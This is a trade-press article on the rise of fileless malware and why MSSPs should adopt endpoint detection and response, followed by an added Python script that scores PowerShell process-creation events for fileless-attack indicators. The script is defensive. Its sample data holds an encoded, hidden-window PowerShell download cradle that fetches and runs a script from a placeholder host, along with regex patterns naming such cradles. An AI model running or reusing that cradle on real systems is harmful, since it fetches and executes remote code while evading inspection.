Accelerating Fileless Malware Attacks Pose Challenge for MSSPs
Fileless malware attacks pose an increasing threat to organizations and MSSPs need to be doing more to stop them.
That’s according to WatchGuard Technologies’ chief technology officer Corey Nachreiner. The 2018 State of Endpoint Security Risk report from the Ponemon Institute projects that 38 percent of attacks targeting companies in 2019 will be fileless.
Fileless malware attacks don’t rely on the attacker writing a malicious executable to the victim’s disk. Instead, adversaries hijack tools that are already built into Windows, such as PowerShell, and run their code in memory inside those legitimate processes, so a scanner that only inspects files on disk has nothing new to examine. The attack still leaves traces, but they show up in process telemetry and memory rather than in the file system.
What’s driving the rise in fileless malware is the same thing that makes these attacks so dangerous, Nachreiner said. Fileless malware is a growing issue because it tends to evade legacy endpoint security controls, such as antivirus (AV) products that rely too heavily on traditional file-based malware detection techniques, he said.
“Fileless malware is simply more capable of sneaking past the endpoint security controls most users have (at the expense of not being as persistent as traditional malware),” he said. “By leveraging legitimate scripting technologies administrators expect to see on Windows systems (such as PowerShell), or by only running in memory — often via legitimate processes that have been hijacked — it’s harder for legacy AV products to find fileless malware. Unless you are using defense technologies that proactively search for malicious and suspicious processes and behaviors, your security controls might miss fileless attacks.”
Fileless malware has grown significantly during the past three years, so MSSPs that aren’t deploying technology capable of finding and cleaning it will have some upset customers on their hands, Nachreiner said.
“The good news is that there are security solutions that fall into the general category of endpoint detection and response (EDR) that can detect fileless malware variants,” he said. “These products sometimes require a bit more management than the average AV solution, so MSSPs can grow their revenue by launching a managed detection and response (MDR) service offering for their customers.”
The degree to which MSSPs and other cybersecurity providers are prepared to safeguard against these threats varies greatly, Nachreiner said.
“That said, I would guess the majority are not,” he said. “The few that have launched MDR services are likely much more prepared than the others. Technology is not perfect, so the arms race between fileless malware and EDR (or other next-generation antivirus technologies) will continue. If you are already offering MDR for your customers, you’ve probably invested in one of the technologies most capable of detecting and preventing fileless malware attacks.”
In addition to EDR, there are other advanced anti-malware solutions that are designed specifically to scan memory and monitor processes to identify malware even if it never drops an actual file, Nachreiner said.
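The process-monitoring approach Nachreiner describes, and that the memory- and process-scanning products mentioned above rely on, comes down to looking at what a legitimate tool was asked to do rather than at a file hash. The script below is an added illustration, not WatchGuard’s code or any EDR product’s detection logic. It scores constructed process-creation events (the parent, image and command-line fields a Sysmon Event ID 1 or Windows Security 4688 record carries) for well-known signs of a fileless PowerShell launch: abbreviated parameters such as -nop, -w hidden, -ep bypass and -enc, a download cradle or Invoke-Expression in the script body, and an Office application as the parent process. The -EncodedCommand payload is decoded the way powershell.exe itself reads it (base64 of the script’s UTF-16LE bytes), so the indicators are matched against the actual script and not just the opaque blob. The sample events, the weights and the alert threshold are assumptions made for the example.

```python
"""Score process-creation events for signs of a fileless PowerShell launch.

Added illustration only, not any vendor's detection logic. Fields used are
those of a Sysmon Event ID 1 / Windows Security 4688 process-creation record.
"""
import base64
import re

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Parents that have no legitimate reason to spawn a shell (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# powershell.exe accepts any unambiguous prefix of a parameter name
# (-enc, -ec and -e all mean -EncodedCommand), so the patterns accept the
# abbreviated spellings as well as the full ones. Weight 1 each.
ARG_INDICATORS = [
    ("encoded command", re.compile(r"(?i)(?:^|\s)-e(?:c|nc\w*)?(?=\s)")),
    ("hidden window", re.compile(r"(?i)(?:^|\s)-w(?:in\w*)?\s+h(?:idden)?(?=\s|$)")),
    ("no profile", re.compile(r"(?i)(?:^|\s)-nop\w*(?=\s|$)")),
    ("execution policy bypass", re.compile(r"(?i)(?:^|\s)-e[px]\w*\s+bypass(?=\s|$)")),
    ("non-interactive", re.compile(r"(?i)(?:^|\s)-noni\w*(?=\s|$)")),
]

# Script-body indicators, matched against the raw command line and against
# any decoded -EncodedCommand payload. Weight 2 each.
SCRIPT_INDICATORS = [
    ("download cradle", re.compile(r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest")),
    ("invoke-expression", re.compile(r"(?i)Invoke-Expression|\bIEX\b")),
    ("embedded base64", re.compile(r"(?i)FromBase64String")),
    ("reflective load", re.compile(r"(?i)Reflection\.Assembly|::Load\(")),
]

OFFICE_PARENT_WEIGHT = 3   # assumed weight
ALERT_THRESHOLD = 3        # assumed threshold: one weak flag alone is not an alert


def encode_powershell_command(script):
    """Build an -EncodedCommand argument: base64 of the script's UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if there is none."""
    m = re.search(r"(?i)(?:^|\s)-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Score one process-creation event; the returned dict is the alert record."""
    result = {"pid": event["pid"], "image": event["image"], "score": 0,
              "indicators": [], "decoded": None}
    # Only the PowerShell process itself is scored: a wrapper such as
    # "cmd.exe /c powershell ..." produces its own child event for powershell.exe.
    if event["image"].lower() not in POWERSHELL_IMAGES:
        return result
    cmdline = event["cmdline"]
    for label, pattern in ARG_INDICATORS:
        if pattern.search(cmdline):
            result["indicators"].append(label)
            result["score"] += 1
    decoded = decode_encoded_command(cmdline)
    result["decoded"] = decoded
    body = cmdline if decoded is None else cmdline + "\n" + decoded
    for label, pattern in SCRIPT_INDICATORS:
        if pattern.search(body):
            result["indicators"].append(label)
            result["score"] += 2
    if event["parent"].lower() in OFFICE_PARENTS:
        result["indicators"].append("spawned by Office application")
        result["score"] += OFFICE_PARENT_WEIGHT
    return result


def scan_events(events, threshold=ALERT_THRESHOLD):
    """Return the alert records whose score reaches the threshold."""
    return [r for r in (analyze_event(e) for e in events) if r["score"] >= threshold]


# Constructed sample events (not real telemetry): two routine PowerShell
# launches, one non-PowerShell process, and a Word-spawned download cradle
# hidden behind -EncodedCommand.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    {"pid": 4012, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"pid": 4050, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": 4220, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 4102, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc " + encode_powershell_command(CRADLE)},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"pid {alert['pid']} score {alert['score']}: {', '.join(alert['indicators'])}")
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

Run against the constructed events, only the Word-spawned launch (pid 4102) crosses the threshold; the two administrative launches each trip a single low-weight flag (-NoProfile, -ExecutionPolicy Bypass) and stay below it. The decode step matters: without it, the only visible signal on the malicious line is the set of abbreviated switches, and an attacker who drops those still leaves the cradle in the decoded script. This is the same trade-off Nachreiner points to, since a behavioural check like this needs continuous process telemetry and tuning rather than a one-time file scan, which is the management overhead that turns EDR into a managed service.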